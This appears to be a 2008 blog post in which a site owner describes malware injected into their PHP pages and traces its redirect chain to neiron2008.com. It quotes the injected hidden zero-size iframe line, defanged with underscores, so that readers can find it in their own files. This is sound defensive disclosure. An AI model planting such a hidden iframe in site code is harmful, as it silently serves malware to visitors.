Life-Tablets.cn / neiron2008.com : How They Distribute Malware On Your Website

[digg-me]
Notice: This is a developing story! Updates will be added as they occur. Help others and report your findings in the comments below! And check your websites for malicious injections.

As previously reported, some of my websites got hacked and broken into. The evil people that did it uses some sneaky technique to actually hide their approach.

Here is how they did and after what you should look.
Check your “index.php”, “main.php” and “login.php” files for the following line of code:

<iframe src="http://li____fe-tab____lets.cn/t___ds/index.php" width=0 height=0 style="visibility:hidden;position:absolute"></iframe>

Remove all underscores “_”. But considered yourself warned! The page above is not doing any good to you, your browser or your computer!

Next, I inspected the linked file that gets included by the iframe-tag. First it redirects a couple of times before you only see a 404 error. But this 404 is faked. The page has some nasty content:

click for bigger image
Important note: After the redirects, you are no longer on life-tablets.net, but on neiron2008.com !!

After de-scrambling the Javascript code, you can see that the declared iframes above the code are been set to an URL:

Following to the new targets you get another HTML page with Javascript. But now all the code is escaped. The file is 14.4 KB big. After unescaping the code (HTML & JavaScript Encoder/Decoder) I got some ugly code with once again unreadable functions.
However I found another URL in the code: zsdbkhtlur.com
But this domain is not and was not registered. Maybe somebody is in early planning stage?

Neiron2008.com has been registered on June 26 2008, 5 days after somebody injected the code in my websites. The domain owner wants to hide, so the registration is proxied by PrivacyProtect.org.

If you have any more information other other JavaScript code, please comment below and warn others!